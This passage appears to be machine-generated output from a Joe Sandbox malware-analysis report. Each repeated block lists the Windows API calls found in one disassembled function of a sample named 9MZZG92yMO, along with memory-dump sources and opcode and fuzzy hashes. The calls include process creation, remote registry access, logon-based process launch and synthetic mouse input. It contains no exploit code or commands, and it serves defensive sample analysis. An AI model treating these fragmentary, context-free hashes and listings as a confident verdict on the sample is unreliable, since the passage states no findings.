                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3567560977-0
                                                                                                                      • Opcode ID: 6d80f92e2cff7d76da3799e4f8d5cb2318eaa7eb3d60c8e35ba1cd2d88427499
                                                                                                                      • Instruction ID: 591745636291602055800ce2b7eab26b77b50c77e450aad47b790ee8b3cb02c0
                                                                                                                      • Opcode Fuzzy Hash: 6d80f92e2cff7d76da3799e4f8d5cb2318eaa7eb3d60c8e35ba1cd2d88427499
                                                                                                                      • Instruction Fuzzy Hash: 02F0C2329193D11EE7747B77BC03A8B2681AF0273BB20062FF414D51D2EE289C40416C
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 0054B644
                                                                                                                      • _memset.LIBCMT ref: 0054B653
                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00586F20,00586F64), ref: 0054B682
                                                                                                                      • CloseHandle.KERNEL32 ref: 0054B694
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memset$CloseCreateHandleProcess
                                                                                                                      • String ID: oX$doX
                                                                                                                      • API String ID: 3277943733-1145776732
                                                                                                                      • Opcode ID: b636b7d1d494f42c81d48d3d6159f40d0b810acba400e7270bb7534c69185b9b
                                                                                                                      • Instruction ID: c1a1bc679c4e4fc5e7c875f09c28c4a5c765b268d57c9ee92835725cb7750ce0
                                                                                                                      • Opcode Fuzzy Hash: b636b7d1d494f42c81d48d3d6159f40d0b810acba400e7270bb7534c69185b9b
                                                                                                                      • Instruction Fuzzy Hash: CAF05EB2540304BAE3102B66BC06FBB3E9CEB19799F005421BF08F5196D7B58C04D7A8
                                                                                                                      APIs
                                                                                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,004E3F85), ref: 004E4085
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 004E408C
                                                                                                                      • EncodePointer.KERNEL32(00000000), ref: 004E4097
                                                                                                                      • DecodePointer.KERNEL32(004E3F85), ref: 004E40B2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                      • String ID: RoUninitialize$combase.dll
                                                                                                                      • API String ID: 3489934621-2819208100
                                                                                                                      • Opcode ID: a52104e8323b98ccc629a4ac7ea4914578c73ec467827d9a6701ecaacc0af62a
                                                                                                                      • Instruction ID: 61b9f36cbf2d1d4bb6f81ebbb9ad364352d2c3c5d6f103c85cd0f511a39583e6
                                                                                                                      • Opcode Fuzzy Hash: a52104e8323b98ccc629a4ac7ea4914578c73ec467827d9a6701ecaacc0af62a
                                                                                                                      • Instruction Fuzzy Hash: 5BE0B678585300EFEB20AF65EC0DB863AA4B726F47F105426F941E11A0CBB6460CFB14
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove$__itow__swprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3253778849-0
                                                                                                                      • Opcode ID: 9d80155e7f2a53e1e73f8c24d63cc00193ec6995be1ce472b138d7b8ebbb779b
                                                                                                                      • Instruction ID: 6f995524c6360459d618c4b0e912783bc1fd0726ca4644696895d1530a39c152
                                                                                                                      • Opcode Fuzzy Hash: 9d80155e7f2a53e1e73f8c24d63cc00193ec6995be1ce472b138d7b8ebbb779b
                                                                                                                      • Instruction Fuzzy Hash: 4E618C3450029AABCF01EF65C886EBE3BA5BF46308F04452EF8155B192DB79AC45CB54
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C7DE1: _memmove.LIBCMT ref: 004C7E22
                                                                                                                        • Part of subcall function 00540E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0053FDAD,?,?), ref: 00540E31
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005402BD
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 005402FD
                                                                                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00540320
                                                                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00540349
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0054038C
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00540399
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4046560759-0
                                                                                                                      • Opcode ID: fdb8b788653b4422afb3e638060440702da845df034930a820bcd0c1cecc51b2
                                                                                                                      • Instruction ID: 4b640f7fa350e17ea2076d9eb880958aece4507c8842ac5addca67370a2b60ff
                                                                                                                      • Opcode Fuzzy Hash: fdb8b788653b4422afb3e638060440702da845df034930a820bcd0c1cecc51b2
                                                                                                                      • Instruction Fuzzy Hash: 92517B35208200AFCB14EF64C889EAFBBE9FF85318F14491DF556872A2DB35E945CB52
                                                                                                                      APIs
                                                                                                                      • GetMenu.USER32(?), ref: 005457FB
                                                                                                                      • GetMenuItemCount.USER32(00000000), ref: 00545832
                                                                                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0054585A
                                                                                                                      • GetMenuItemID.USER32(?,?), ref: 005458C9
                                                                                                                      • GetSubMenu.USER32(?,?), ref: 005458D7
                                                                                                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 00545928
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Item$CountMessagePostString
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 650687236-0
                                                                                                                      • Opcode ID: a7ecf2353716f308a2c64e4ff6c9a780ea7dc2e6951da6754e9257b58c0f47fd
                                                                                                                      • Instruction ID: 9414e5f8e011280c578e392891d208b83e241f9022998788621fbc02f3a474aa
                                                                                                                      • Opcode Fuzzy Hash: a7ecf2353716f308a2c64e4ff6c9a780ea7dc2e6951da6754e9257b58c0f47fd
                                                                                                                      • Instruction Fuzzy Hash: B0516B35A00615EFCF11AF65C845AEEBBB4FF49328F10446AE801AB252DB74AE419B94
                                                                                                                      APIs
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0051EF06
                                                                                                                      • VariantClear.OLEAUT32(00000013), ref: 0051EF78
                                                                                                                      • VariantClear.OLEAUT32(00000000), ref: 0051EFD3
                                                                                                                      • _memmove.LIBCMT ref: 0051EFFD
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0051F04A
                                                                                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0051F078
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1101466143-0
                                                                                                                      • Opcode ID: 7bd3baf8ec757ddcac9f3f7e5bc278e51a6ce2e3aa1c392c4843d0ba47e6d586
                                                                                                                      • Instruction ID: 56c915852514fa9133ce3645fb194be250e86a543daaa57e07246265bd0e3b60
                                                                                                                      • Opcode Fuzzy Hash: 7bd3baf8ec757ddcac9f3f7e5bc278e51a6ce2e3aa1c392c4843d0ba47e6d586
                                                                                                                      • Instruction Fuzzy Hash: 56513AB5A00209EFDB14CF58C884AAABBF8FF4C314B158569ED59DB301E735E951CBA0
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 00522258
                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005222A3
                                                                                                                      • IsMenu.USER32(00000000), ref: 005222C3
                                                                                                                      • CreatePopupMenu.USER32 ref: 005222F7
                                                                                                                      • GetMenuItemCount.USER32(000000FF), ref: 00522355
                                                                                                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00522386
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3311875123-0
                                                                                                                      • Opcode ID: 621d121373b588747ee75abf3cc3298cb79cacb376fbd2add1cf0063b43f6718
                                                                                                                      • Instruction ID: fa82e2b0195e481b0be2de81df54490c8ac51f5815f926bf32a88acb00d8d464
                                                                                                                      • Opcode Fuzzy Hash: 621d121373b588747ee75abf3cc3298cb79cacb376fbd2add1cf0063b43f6718
                                                                                                                      • Instruction Fuzzy Hash: CE51B23850026AFBDF25CF68E988BADBFF5BF66318F104929E811972D0D3788904CB51
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C2612: GetWindowLongW.USER32(?,000000EB), ref: 004C2623
                                                                                                                      • BeginPaint.USER32(?,?,?,?,?,?), ref: 004C179A
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004C17FE
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 004C181B
                                                                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 004C182C
                                                                                                                      • EndPaint.USER32(?,?), ref: 004C1876
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1827037458-0
                                                                                                                      • Opcode ID: 6ec534c14a6c14ab7f0cefbe9137a4a35c4fb785637e4476697c3d7b3f215c16
                                                                                                                      • Instruction ID: 24c0c2fdaf041a8152803c82ebe356230da8d1b45041fc51e7d7b572b4c3e04a
                                                                                                                      • Opcode Fuzzy Hash: 6ec534c14a6c14ab7f0cefbe9137a4a35c4fb785637e4476697c3d7b3f215c16
                                                                                                                      • Instruction Fuzzy Hash: C541B1381043009FD710EF25CC84FBA7BE8EB56324F14466EF994962B2D7349809DB66
                                                                                                                      APIs
                                                                                                                      • ShowWindow.USER32(005857B0,00000000,01085420,?,?,005857B0,?,0054B5A8,?,?), ref: 0054B712
                                                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 0054B736
                                                                                                                      • ShowWindow.USER32(005857B0,00000000,01085420,?,?,005857B0,?,0054B5A8,?,?), ref: 0054B796
                                                                                                                      • ShowWindow.USER32(00000000,00000004,?,0054B5A8,?,?), ref: 0054B7A8
                                                                                                                      • EnableWindow.USER32(00000000,00000001), ref: 0054B7CC
                                                                                                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0054B7EF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 642888154-0
                                                                                                                      • Opcode ID: 9e1ec8464b73d9dad4082e2b29d0d5041456e80e086f85b07a1bd43a02a4e3aa
                                                                                                                      • Instruction ID: a02f3116bab3fc5eda796c13de0918c5c92b35bdad8750587ce21f62f3f2277e
                                                                                                                      • Opcode Fuzzy Hash: 9e1ec8464b73d9dad4082e2b29d0d5041456e80e086f85b07a1bd43a02a4e3aa
                                                                                                                      • Instruction Fuzzy Hash: B8417D34600240AFEB26CF28C499BD57FE1FF85318F1841B9EA498F6A2C731E856CB51
                                                                                                                      APIs
                                                                                                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,00534E41,?,?,00000000,00000001), ref: 005370AC
                                                                                                                        • Part of subcall function 005339A0: GetWindowRect.USER32(?,?), ref: 005339B3
                                                                                                                      • GetDesktopWindow.USER32 ref: 005370D6
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 005370DD
                                                                                                                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0053710F
                                                                                                                        • Part of subcall function 00525244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 005252BC
                                                                                                                      • GetCursorPos.USER32(?), ref: 0053713B
                                                                                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00537199
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4137160315-0
                                                                                                                      • Opcode ID: 4008ac35c624ad52c5a440746898cc2a2ad58982310dc0af18b06d83034bbc55
                                                                                                                      • Instruction ID: a244bac33999ec3fa69a7461838e2932f139271ac48ad8ef8fb36008c54a8855
                                                                                                                      • Opcode Fuzzy Hash: 4008ac35c624ad52c5a440746898cc2a2ad58982310dc0af18b06d83034bbc55
                                                                                                                      • Instruction Fuzzy Hash: 6131D27250930AABD720DF54D849F9BBBE9FF89314F000919F58597191D630EA09CB92
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 005180A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 005180C0
                                                                                                                        • Part of subcall function 005180A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 005180CA
                                                                                                                        • Part of subcall function 005180A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 005180D9
                                                                                                                        • Part of subcall function 005180A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 005180E0
                                                                                                                        • Part of subcall function 005180A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 005180F6
                                                                                                                      • GetLengthSid.ADVAPI32(?,00000000,0051842F), ref: 005188CA
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 005188D6
                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 005188DD
                                                                                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 005188F6
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,0051842F), ref: 0051890A
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00518911
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3008561057-0
                                                                                                                      • Opcode ID: 20d087a7674a440daa24c71ce469afb9ceeaf88b50a0d1eb7f01188cfb24f871
                                                                                                                      • Instruction ID: 5382bc532c81e6f0be276f4dae00f06ea8cca398f39b94c361c5d9731ae696cf
                                                                                                                      • Opcode Fuzzy Hash: 20d087a7674a440daa24c71ce469afb9ceeaf88b50a0d1eb7f01188cfb24f871
                                                                                                                      • Instruction Fuzzy Hash: 3B11AF35501209FFEB209FA8DC09BFE7BA8FB85315F104468F84597110CB32A984EB60
                                                                                                                      APIs
                                                                                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 005185E2
                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 005185E9
                                                                                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 005185F8
                                                                                                                      • CloseHandle.KERNEL32(00000004), ref: 00518603
                                                                                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00518632
                                                                                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00518646
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1413079979-0
                                                                                                                      • Opcode ID: 7fe7ee1faae16b1532ba00ca1d49703c6b831f02cef0daedbdb221369129bfa9
                                                                                                                      • Instruction ID: 03475469ae0069fbecf2040460717988375567552e6eb4be73b2843432b19bbb
                                                                                                                      • Opcode Fuzzy Hash: 7fe7ee1faae16b1532ba00ca1d49703c6b831f02cef0daedbdb221369129bfa9
                                                                                                                      • Instruction Fuzzy Hash: B1118976100209ABEF118FA8DC48FEE7BA9FF49348F044024FE05A2160C7768DA4EB60
                                                                                                                      APIs
                                                                                                                      • GetDC.USER32(00000000), ref: 0051B7B5
                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 0051B7C6
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0051B7CD
                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0051B7D5
                                                                                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0051B7EC
                                                                                                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 0051B7FE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsDevice$Release
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1035833867-0
                                                                                                                      • Opcode ID: 07c15e4271628a6496a2a58c45e9efe7052669c26c3f449dce8f1c0a69602dbd
                                                                                                                      • Instruction ID: 357269074b34e91a13a5032af38c67a834c70e6c5d7e6cb46d4be8f8c4985a17
                                                                                                                      • Opcode Fuzzy Hash: 07c15e4271628a6496a2a58c45e9efe7052669c26c3f449dce8f1c0a69602dbd
                                                                                                                      • Instruction Fuzzy Hash: 010184B5E00319BBEB109BBA9C49A9EBFB8EB59351F044075FA08A7291D6309C00CF90
                                                                                                                      APIs
                                                                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 004E0193
                                                                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 004E019B
                                                                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004E01A6
                                                                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004E01B1
                                                                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 004E01B9
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004E01C1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
